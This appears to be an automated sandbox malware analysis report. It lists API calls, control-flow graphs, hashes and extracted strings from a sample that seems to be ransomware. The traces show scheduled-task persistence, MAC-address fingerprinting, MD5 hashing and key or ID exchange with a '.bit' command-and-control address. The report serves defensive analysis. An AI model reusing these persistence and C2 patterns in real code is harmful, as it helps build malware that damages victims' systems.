                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                • _strstr.LIBCMT ref: 0041EA36
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                • _malloc.LIBCMT ref: 0041EB86
                                                                                                • _memset.LIBCMT ref: 0041EB94
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                • _strstr.LIBCMT ref: 0041EBDA
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041EC3E
                                                                                                • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041EC93
                                                                                                • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
                                                                                                • lstrlenA.KERNEL32(?), ref: 0041ED4B
                                                                                                • _malloc.LIBCMT ref: 0041ED55
                                                                                                • _memset.LIBCMT ref: 0041ED63
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041EDA3
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041EDAE
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0041EE05
                                                                                                • _free.LIBCMT ref: 0041EE15
                                                                                                • _free.LIBCMT ref: 0041EE22
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                • API String ID: 704684250-3586605218
                                                                                                • Opcode ID: 6bb2b37fa8f33f4e42fac9bac8f14efb082cebc4ba882b8752c2bd9b785744bc
                                                                                                • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                                                                                                • Opcode Fuzzy Hash: 6bb2b37fa8f33f4e42fac9bac8f14efb082cebc4ba882b8752c2bd9b785744bc
                                                                                                • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1213 40d240-40d274 CoInitialize 1214 40d276-40d278 1213->1214 1215 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 1213->1215 1216 40da8e-40da92 1214->1216 1222 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 40da3c-40da44 CoUninitialize 1215->1223 1218 40da94-40da9c call 422587 1216->1218 1219 40da9f-40dab1 1216->1219 1218->1219 1230 40d3e2-40d3fe call 40b140 1222->1230 1231 40d3cc-40d3dd CoUninitialize 1222->1231 1225 40da69-40da6d 1223->1225 1227 40da7a-40da8a 1225->1227 1228 40da6f-40da77 call 422587 1225->1228 1227->1216 1228->1227 1236 40d400-40d402 1230->1236 1237 40d404 1230->1237 1231->1225 1238 40d406-40d424 call 40b1d0 1236->1238 1237->1238 1242 40d426-40d437 CoUninitialize 1238->1242 1243 40d43c-40d451 call 40b140 1238->1243 1242->1225 1247 40d453-40d455 1243->1247 1248 40d457 1243->1248 1249 40d459-40d494 call 40b1d0 1247->1249 1248->1249 1255 40d496-40d4a7 CoUninitialize 1249->1255 1256 40d4ac-40d4c2 1249->1256 1255->1225 1259 40d4c8-40d4dd call 40b140 1256->1259 1260 40da2a-40da37 1256->1260 1264 40d4e3 1259->1264 1265 40d4df-40d4e1 1259->1265 1260->1223 1266 40d4e5-40d508 call 40b1d0 1264->1266 1265->1266 1266->1260 1271 40d50e-40d524 1266->1271 1271->1260 1273 40d52a-40d542 1271->1273 1273->1260 1276 40d548-40d55e 1273->1276 1276->1260 1278 40d564-40d57c 1276->1278 1278->1260 1281 40d582-40d59b 1278->1281 1281->1260 1283 40d5a1-40d5b6 call 40b140 1281->1283 1286 40d5b8-40d5ba 1283->1286 1287 40d5bc 1283->1287 1288 40d5be-40d5e1 call 40b1d0 1286->1288 1287->1288 1288->1260 1293 40d5e7-40d5fd 1288->1293 1293->1260 1295 40d603-40d626 1293->1295 1295->1260 1298 40d62c-40d651 1295->1298 1298->1260 1301 40d657-40d666 1298->1301 1301->1260 1303 40d66c-40d681 call 40b140 1301->1303 1306 40d683-40d685 1303->1306 1307 40d687 1303->1307 1308 40d689-40d6a3 call 40b1d0 1306->1308 1307->1308 1308->1260 1312 40d6a9-40d6be call 40b140 1308->1312 1315 40d6c0-40d6c2 1312->1315 1316 40d6c4 1312->1316 1317 40d6c6-40d6e0 call 40b1d0 1315->1317 1316->1317 1317->1260 1321 40d6e6-40d6f4 1317->1321 1321->1260 1323 40d6fa-40d70f call 40b140 1321->1323 1326 40d711-40d713 1323->1326 1327 40d715 1323->1327 1328 40d717-40d731 call 40b1d0 1326->1328 1327->1328 1328->1260 1332 40d737-40d74c call 40b140 1328->1332 1335 40d752 1332->1335 1336 40d74e-40d750 1332->1336 1337 40d754-40d76e call 40b1d0 1335->1337 1336->1337 1337->1260 1341 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 1337->1341 1352 40d7d0 1341->1352 1353 40d7d2-40d7e3 call 40b140 1341->1353 1352->1353 1356 40d7e5-40d7e7 1353->1356 1357 40d7e9 1353->1357 1358 40d7eb-40d819 call 40b1d0 call 413210 1356->1358 1357->1358 1358->1260 1365 40d81f-40d835 1358->1365 1365->1260 1367 40d83b-40d85e 1365->1367 1367->1260 1370 40d864-40d889 1367->1370 1370->1260 1373 40d88f-40d8ab call 40b140 1370->1373 1376 40d8b1 1373->1376 1377 40d8ad-40d8af 1373->1377 1378 40d8b3-40d8cd call 40b1d0 1376->1378 1377->1378 1382 40d8dd-40d8f2 call 40b140 1378->1382 1383 40d8cf-40d8d8 1378->1383 1387 40d8f4-40d8f6 1382->1387 1388 40d8f8 1382->1388 1383->1260 1389 40d8fa-40d91d call 40b1d0 1387->1389 1388->1389 1389->1260 1394 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 1389->1394 1399 40d993 1394->1399 1400 40d98f-40d991 1394->1400 1401 40d995-40da0e call 40b1d0 VariantClear * 3 1399->1401 1400->1401 1405 40da10-40da27 call 42052a 1401->1405 1406 40da46-40da67 CoUninitialize 1401->1406 1405->1260 1406->1225
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                • API String ID: 2496729271-1738591096
                                                                                                • Opcode ID: eb9b6e3a56b55b9ec0b2091368e032180d056ab99cd426cc3779bf646a33140d
                                                                                                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                • Opcode Fuzzy Hash: eb9b6e3a56b55b9ec0b2091368e032180d056ab99cd426cc3779bf646a33140d
                                                                                                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                • _memset.LIBCMT ref: 004110CA
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                • _malloc.LIBCMT ref: 00411100
                                                                                                • _memset.LIBCMT ref: 0041110B
                                                                                                • _sprintf.LIBCMT ref: 0041112E
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 2451520719-213608013
                                                                                                • Opcode ID: 311085bb5f21d25cc81269d1f638485d68d47ea2dd31f96a3b3f67442ef4dd82
                                                                                                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                • Opcode Fuzzy Hash: 311085bb5f21d25cc81269d1f638485d68d47ea2dd31f96a3b3f67442ef4dd82
                                                                                                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                APIs
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                                                                                                • _memmove.LIBCMT ref: 0040F9EA
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                • _memmove.LIBCMT ref: 0040FADA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 273148273-0
                                                                                                • Opcode ID: b95a280afb5ab5b99b946805d895d13019c9a1f3055eeb8ed87e1e7914df6449
                                                                                                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                • Opcode Fuzzy Hash: b95a280afb5ab5b99b946805d895d13019c9a1f3055eeb8ed87e1e7914df6449
                                                                                                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1885 40e870-40e8d6 call 4156d0 CryptAcquireContextW 1888 40e8d8-40e8e4 call 430eca 1885->1888 1889 40e8e9-40e901 CryptCreateHash 1885->1889 1888->1889 1891 40e903-40e90f call 430eca 1889->1891 1892 40e914-40e930 CryptHashData 1889->1892 1891->1892 1894 40e932-40e93e call 430eca 1892->1894 1895 40e943-40e961 CryptGetHashParam 1892->1895 1894->1895 1897 40e963-40e96f call 430eca 1895->1897 1898 40e974-40e9a6 call 420be4 call 42b420 CryptGetHashParam 1895->1898 1897->1898 1904 40e9a8-40e9b4 call 430eca 1898->1904 1905 40e9b9-40e9bb 1898->1905 1904->1905 1907 40e9c0-40e9c3 1905->1907 1908 40ea10-40ea31 call 422110 CryptDestroyHash CryptReleaseContext 1907->1908 1909 40e9c5-40e9df call 4204a6 1907->1909 1914 40ea33-40ea3b call 422587 1908->1914 1915 40ea3e-40ea50 1908->1915 1916 40e9e1-40e9f0 call 413ea0 1909->1916 1917 40e9f2-40e9f5 1909->1917 1914->1915 1916->1907 1918 40e9f8-40e9fd 1917->1918 1918->1918 1921 40e9ff-40ea0e call 413ea0 1918->1921 1921->1907
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                • _memset.LIBCMT ref: 0040E98E
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 1084002244-213608013
                                                                                                • Opcode ID: 2ce7e8a25c16a4969ccda2bf48f5d53057bc0210bbf1fadcc46dadeb46fe5b87
                                                                                                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                • Opcode Fuzzy Hash: 2ce7e8a25c16a4969ccda2bf48f5d53057bc0210bbf1fadcc46dadeb46fe5b87
                                                                                                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1926 40eaa0-40eb09 call 4156d0 CryptAcquireContextW 1929 40eb0b-40eb17 call 430eca 1926->1929 1930 40eb1c-40eb34 CryptCreateHash 1926->1930 1929->1930 1931 40eb36-40eb42 call 430eca 1930->1931 1932 40eb47-40eb56 CryptHashData 1930->1932 1931->1932 1935 40eb58-40eb64 call 430eca 1932->1935 1936 40eb69-40eb87 CryptGetHashParam 1932->1936 1935->1936 1938 40eb89-40eb95 call 430eca 1936->1938 1939 40eb9a-40ebcc call 420be4 call 42b420 CryptGetHashParam 1936->1939 1938->1939 1945 40ebce-40ebda call 430eca 1939->1945 1946 40ebdf 1939->1946 1945->1946 1947 40ebe1-40ebe4 1946->1947 1949 40ebe6-40ec00 call 4204a6 1947->1949 1950 40ec38-40ec67 call 422110 CryptDestroyHash CryptReleaseContext 1947->1950 1955 40ec02-40ec11 call 413ea0 1949->1955 1956 40ec13-40ec19 1949->1956 1955->1947 1958 40ec20-40ec25 1956->1958 1958->1958 1960 40ec27-40ec36 call 413ea0 1958->1960 1960->1947
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                • _memset.LIBCMT ref: 0040EBB4
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 1637485200-213608013
                                                                                                • Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                • Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
                                                                                                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1963 40e670-40e697 call 420c62 * 2 1968 40e6b4-40e6c2 GetAdaptersInfo 1963->1968 1969 40e699-40e6b3 call 421f2d call 420bed 1963->1969 1971 40e6c4-40e6d9 call 420bed call 420c62 1968->1971 1972 40e6db-40e6e8 GetAdaptersInfo 1968->1972 1971->1969 1971->1972 1973 40e744-40e754 call 420bed 1972->1973 1974 40e6ea-40e73c call 4204a6 call 421f2d * 2 1972->1974 1989 40e741 1974->1989 1989->1973
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0040E67F
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                • _malloc.LIBCMT ref: 0040E68B
                                                                                                • _wprintf.LIBCMT ref: 0040E69E
                                                                                                • _free.LIBCMT ref: 0040E6A4
                                                                                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                                                                                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                • _free.LIBCMT ref: 0040E6C5
                                                                                                • _malloc.LIBCMT ref: 0040E6CD
                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                • _sprintf.LIBCMT ref: 0040E720
                                                                                                • _wprintf.LIBCMT ref: 0040E732
                                                                                                • _wprintf.LIBCMT ref: 0040E73C
                                                                                                • _free.LIBCMT ref: 0040E745
                                                                                                Strings
                                                                                                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                • API String ID: 3901070236-1604013687
                                                                                                • Opcode ID: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
                                                                                                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                • Opcode Fuzzy Hash: 02e9612f127fb412d77a5d1f2b2faf682c4a1611dcf75e79c66b72e064a0daf3
                                                                                                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
